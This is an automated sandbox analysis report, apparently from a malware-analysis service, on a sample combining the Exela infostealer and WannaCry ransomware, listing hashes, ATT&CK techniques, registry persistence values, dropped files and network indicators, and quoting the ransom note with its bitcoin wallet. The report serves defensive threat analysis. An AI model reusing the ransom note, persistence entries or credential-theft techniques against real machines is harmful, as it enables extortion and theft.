exelastealer | 0849b85e16da3b4fc89ec373fd9f42dc6cfa61f5592792bf48991f1e8d544d3a

Resubmissions

14/04/2025, 14:30

250414-rt5nzaynz8 10

14/04/2025, 02:20

12/04/2025, 17:10

12/04/2025, 02:16

12/04/2025, 02:09

11/04/2025, 20:14

11/04/2025, 20:13

11/04/2025, 18:52

Analysis

max time kernel
889s
max time network
891s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
14/04/2025, 14:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cooker.exe
Size

16.9MB
MD5

80db6fcf8a589124f620ec27b3b7fb7b
SHA1

041e55bf6872fab5589f1262918cb2a3609a1838
SHA256

0849b85e16da3b4fc89ec373fd9f42dc6cfa61f5592792bf48991f1e8d544d3a
SHA512

86ed5a8be7b05d73101dd5d0e9ba1da49caf9ebc55ddcf3fb4a38fb7855169211403dfa00d27a180a7229b51692f3f1f7967b05e382d741a4146de5b637cf1c0
SSDEEP

393216:fCnSigft7o+XsyZKHHRVs50bie1wnb4wCRYr7GNGu:fC+f5zcTHxVpbiCsAs7g

Score

10^/10

exelastealer wannacry collection credential_access defense_evasion discovery execution impact motw persistence phishing privilege_escalation pyinstaller ransomware spyware stealer upx worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Exelastealer family
exelastealer
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Contacts a large (514) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Downloads MZ/PE file 7 IoCs

flow	pid	Process
1922	5572	setup.exe
2575	8256	setup.exe
2623	9832	setup.exe
2690	5280	setup.exe
2735	5452	setup.exe
2770	4372	setup.exe
2774	10016	setup.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3444	netsh.exe
2384	netsh.exe

Uses browser remote debugging 2 TTPs 25 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
9072	chrome.exe
1372	chrome.exe
4856	chrome.exe
8204	chrome.exe
708	chrome.exe
3600	chrome.exe
8196	chrome.exe
7564	chrome.exe
4492	chrome.exe
5864	chrome.exe
8064	chrome.exe
6244	chrome.exe
4568	chrome.exe
4936	chrome.exe
4540	chrome.exe
6832	chrome.exe
8892	chrome.exe
9496	chrome.exe
5860	chrome.exe
5028	chrome.exe
5820	chrome.exe
5056	chrome.exe
1592	chrome.exe
9024	chrome.exe
4548	chrome.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	cooker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	Cyber Sniff.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5112	cmd.exe
4904	powershell.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Deletes itself 1 IoCs

pid	Process
3652	PACKED.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7C8F.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7C96.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 64 IoCs

pid	Process
2404	kitty_portable.exe
5004	AutoClicker-3.1.exe
4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
1296	Cyber Sniff.exe
5080	WindowsUpdateDaemon.exe
1992	PACKED.exe
4320	CyberSniff.exe
3652	PACKED.exe
2524	taskdl.exe
5916	Exela.exe
5480	Exela.exe
2460	@[email protected]
5380	@[email protected]
6104	taskhsvc.exe
6092	taskse.exe
5160	@[email protected]
4660	taskdl.exe
5104	@[email protected]
5348	@[email protected]
5308	taskse.exe
3028	taskdl.exe
1920	@[email protected]
6000	taskse.exe
2472	taskdl.exe
4800	taskse.exe
1020	@[email protected]
944	taskdl.exe
2416	@[email protected]
1508	taskse.exe
3440	taskdl.exe
3336	taskse.exe
116	@[email protected]
4484	taskdl.exe
9872	taskse.exe
9888	@[email protected]
10212	taskdl.exe
8756	taskse.exe
8668	@[email protected]
8568	taskdl.exe
8412	taskse.exe
8428	@[email protected]
8376	taskdl.exe
4104	taskse.exe
1820	@[email protected]
3060	taskdl.exe
5084	@[email protected]
10016	taskse.exe
9740	taskdl.exe
8448	@[email protected]
8420	taskse.exe
8336	taskdl.exe
10200	taskse.exe
9340	@[email protected]
8844	taskdl.exe
8240	@[email protected]
7320	taskse.exe
9480	taskdl.exe
8872	taskse.exe
8864	@[email protected]
4904	taskdl.exe
9520	taskse.exe
916	@[email protected]
1628	taskdl.exe
3564	@[email protected]

Loads dropped DLL 64 IoCs

pid	Process
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
3652	PACKED.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
5480	Exela.exe
3652	PACKED.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1044	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ecvwkmllmsw805 = "\"C:\\Users\\Admin\\AppData\\Roaming\\tasksche.exe\""	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1645	drive.google.com
1646	drive.google.com
1647	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc	pid	Process
3077	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html	7376	chrome.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2016	cmd.exe
1812	ARP.EXE

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000c000000024133-20.dat	autoit_exe
behavioral1/memory/3652-444-0x00000249E7A40000-0x00000249E7DB4000-memory.dmp	autoit_exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5148	tasklist.exe
5000	tasklist.exe
3884	tasklist.exe
1160	tasklist.exe
4584	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5648	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000200000001e756-4.dat	upx
behavioral1/memory/2404-18-0x0000000000400000-0x0000000000643000-memory.dmp	upx
behavioral1/memory/3652-281-0x00007FFD1EE90000-0x00007FFD1F2F5000-memory.dmp	upx
behavioral1/files/0x0007000000024216-278.dat	upx
behavioral1/memory/3652-292-0x00007FFD2E470000-0x00007FFD2E49C000-memory.dmp	upx
behavioral1/memory/3652-295-0x00007FFD2E3F0000-0x00007FFD2E40E000-memory.dmp	upx
behavioral1/memory/3652-296-0x00007FFD1E840000-0x00007FFD1E9AD000-memory.dmp	upx
behavioral1/memory/3652-308-0x00007FFD2D4D0000-0x00007FFD2D586000-memory.dmp	upx
behavioral1/memory/3652-319-0x00007FFD2EBB0000-0x00007FFD2EBC9000-memory.dmp	upx
behavioral1/memory/3652-322-0x00007FFD2E3F0000-0x00007FFD2E40E000-memory.dmp	upx
behavioral1/memory/3652-329-0x00007FFD2D4D0000-0x00007FFD2D586000-memory.dmp	upx
behavioral1/memory/3652-331-0x00007FFD1DBA0000-0x00007FFD1E39E000-memory.dmp	upx
behavioral1/memory/3652-327-0x00007FFD2E250000-0x00007FFD2E25A000-memory.dmp	upx
behavioral1/memory/3652-326-0x00007FFD1E840000-0x00007FFD1E9AD000-memory.dmp	upx
behavioral1/memory/3652-325-0x00007FFD2DDF0000-0x00007FFD2DE0E000-memory.dmp	upx
behavioral1/memory/3652-324-0x00007FFD2DA30000-0x00007FFD2DA62000-memory.dmp	upx
behavioral1/memory/3652-334-0x00007FFD297E0000-0x00007FFD29817000-memory.dmp	upx
behavioral1/memory/3652-333-0x00007FFD1E4C0000-0x00007FFD1E834000-memory.dmp	upx
behavioral1/memory/3652-323-0x00007FFD2DE10000-0x00007FFD2DE21000-memory.dmp	upx
behavioral1/memory/3652-535-0x00007FFD2E2D0000-0x00007FFD2E2E0000-memory.dmp	upx
behavioral1/memory/3652-321-0x00007FFD2DE30000-0x00007FFD2DE7D000-memory.dmp	upx
behavioral1/memory/3652-320-0x00007FFD2DE80000-0x00007FFD2DE98000-memory.dmp	upx
behavioral1/memory/3652-328-0x00007FFD2E2E0000-0x00007FFD2E30E000-memory.dmp	upx
behavioral1/memory/3652-318-0x00007FFD2E290000-0x00007FFD2E2A5000-memory.dmp	upx
behavioral1/memory/3652-317-0x00007FFD2DF40000-0x00007FFD2DF5B000-memory.dmp	upx
behavioral1/memory/3652-316-0x00007FFD2E260000-0x00007FFD2E283000-memory.dmp	upx
behavioral1/memory/3652-315-0x00007FFD1E3A0000-0x00007FFD1E4B8000-memory.dmp	upx
behavioral1/memory/3652-314-0x00007FFD2E2B0000-0x00007FFD2E2C9000-memory.dmp	upx
behavioral1/memory/3652-313-0x00007FFD2E2D0000-0x00007FFD2E2E0000-memory.dmp	upx
behavioral1/memory/3652-312-0x00007FFD2E3D0000-0x00007FFD2E3E4000-memory.dmp	upx
behavioral1/memory/3652-310-0x00007FFD1E4C0000-0x00007FFD1E834000-memory.dmp	upx
behavioral1/memory/3652-309-0x00007FFD1EE90000-0x00007FFD1F2F5000-memory.dmp	upx
behavioral1/memory/3652-307-0x00007FFD2E2E0000-0x00007FFD2E30E000-memory.dmp	upx
behavioral1/memory/2404-306-0x0000000000400000-0x0000000000643000-memory.dmp	upx
behavioral1/memory/3652-294-0x00007FFD32260000-0x00007FFD3226D000-memory.dmp	upx
behavioral1/memory/3652-293-0x00007FFD2EBB0000-0x00007FFD2EBC9000-memory.dmp	upx
behavioral1/memory/3652-291-0x00007FFD31FF0000-0x00007FFD32009000-memory.dmp	upx
behavioral1/memory/3652-290-0x00007FFD32270000-0x00007FFD3227F000-memory.dmp	upx
behavioral1/memory/3652-289-0x00007FFD321A0000-0x00007FFD321C4000-memory.dmp	upx
behavioral1/files/0x00070000000241ba-284.dat	upx
behavioral1/memory/3652-543-0x00007FFD2DF40000-0x00007FFD2DF5B000-memory.dmp	upx
behavioral1/memory/3652-542-0x00007FFD2E3D0000-0x00007FFD2E3E4000-memory.dmp	upx
behavioral1/memory/2404-650-0x0000000000400000-0x0000000000643000-memory.dmp	upx
behavioral1/memory/3652-1023-0x00007FFD2DE30000-0x00007FFD2DE7D000-memory.dmp	upx
behavioral1/memory/3652-1022-0x00007FFD2DE80000-0x00007FFD2DE98000-memory.dmp	upx
behavioral1/memory/3652-1881-0x00007FFD1EE90000-0x00007FFD1F2F5000-memory.dmp	upx
behavioral1/memory/3652-1882-0x00007FFD321A0000-0x00007FFD321C4000-memory.dmp	upx
behavioral1/memory/3652-1893-0x00007FFD2E3D0000-0x00007FFD2E3E4000-memory.dmp	upx
behavioral1/memory/3652-1906-0x00007FFD1DBA0000-0x00007FFD1E39E000-memory.dmp	upx
behavioral1/memory/5480-2000-0x00007FFD1B900000-0x00007FFD1BD65000-memory.dmp	upx
behavioral1/memory/5480-2002-0x00007FFD37100000-0x00007FFD3710F000-memory.dmp	upx
behavioral1/memory/5480-2001-0x00007FFD29130000-0x00007FFD29154000-memory.dmp	upx
behavioral1/memory/5480-2003-0x00007FFD297C0000-0x00007FFD297D9000-memory.dmp	upx
behavioral1/memory/5480-2004-0x00007FFD1D480000-0x00007FFD1D4AC000-memory.dmp	upx
behavioral1/memory/5480-2005-0x00007FFD25280000-0x00007FFD25299000-memory.dmp	upx
behavioral1/memory/5480-2006-0x00007FFD2DA20000-0x00007FFD2DA2D000-memory.dmp	upx
behavioral1/memory/5480-2008-0x00007FFD1D0B0000-0x00007FFD1D21D000-memory.dmp	upx
behavioral1/memory/5480-2007-0x00007FFD24BD0000-0x00007FFD24BEE000-memory.dmp	upx
behavioral1/memory/5480-2009-0x00007FFD1B900000-0x00007FFD1BD65000-memory.dmp	upx
behavioral1/memory/5480-2012-0x00007FFD1CFF0000-0x00007FFD1D0A6000-memory.dmp	upx
behavioral1/memory/5480-2011-0x00007FFD1B580000-0x00007FFD1B8F4000-memory.dmp	upx
behavioral1/memory/5480-2010-0x00007FFD1D450000-0x00007FFD1D47E000-memory.dmp	upx
behavioral1/memory/5480-2013-0x00007FFD1F710000-0x00007FFD1F724000-memory.dmp	upx
behavioral1/memory/5480-2019-0x00007FFD25280000-0x00007FFD25299000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1112345251\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1481845404\shoppingfre.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-ec\th\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-hub\th\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification\ja\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-shared-components\pt-PT\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1336236363\Part-IT	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-tokenized-card\en-GB\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-tokenized-card\pt-BR\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Notification\notification.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\wallet-icon.svg	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\wallet-webui-560.da6c8914bf5007e1044c.chunk.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping9488_1724445627\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1702286134\typosquatting_list.pb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-mn-cyrl.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-ec\ru\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\deny_etld1_domains.list	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\wallet\wallet-stable.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping9488_1724445627\deny_etld1_domains.list	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-de-1901.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1481845404\shopping_fre.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-mobile-hub\ru\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification\id\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification\sv\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-shared-components\fi\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-tokenized-card\zh-Hant\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1702286134\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_10239844\kp_pinslist.pb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification\en-GB\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Wallet-Checkout\load-ec-deps.bundle.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1736437544\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-af.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-nn.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1112345251\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1481845404\auto_open_controller.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping9488_1797297620\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_999511487\LICENSE	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1481845404\edge_confirmation_page_validator.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-shared-components\da\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-tokenized-card\zh-Hans\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-nl.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_227157870\_metadata\verified_contents.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1452778922\deny_domains.list	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1336236363\Filtering Rules-CA	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification\pt-PT\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Tokenized-Card\tokenized-card.bundle.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Wallet-BuyNow\wallet-buynow.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1112345251\arbitration_metadata.txt	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-ec\it\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification\es\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-mobile-hub\pt-BR\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification-shared\ko\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\wallet\wallet-tokenization-config.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Notification\notification_fast.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1755002740\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-cu.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-notification-shared\es\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-mobile-hub\en-GB\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\bnpl\bnpl.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\json\i18n-mobile-hub\ja\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1288_1630142850\Mini-Wallet\mini-wallet.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-en-us.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping5856_1935879407\hyph-et.hyb	msedge.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4188	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00080000000241af-159.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 7 IoCs

pid	pid_target	Process	procid_target
2704	5572	WerFault.exe	554
7628	10016	WerFault.exe	591
7748	8256	WerFault.exe	586
9152	9832	WerFault.exe	588
9540	5280	WerFault.exe	587
5732	5452	WerFault.exe	590
2396	4372	WerFault.exe	592

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
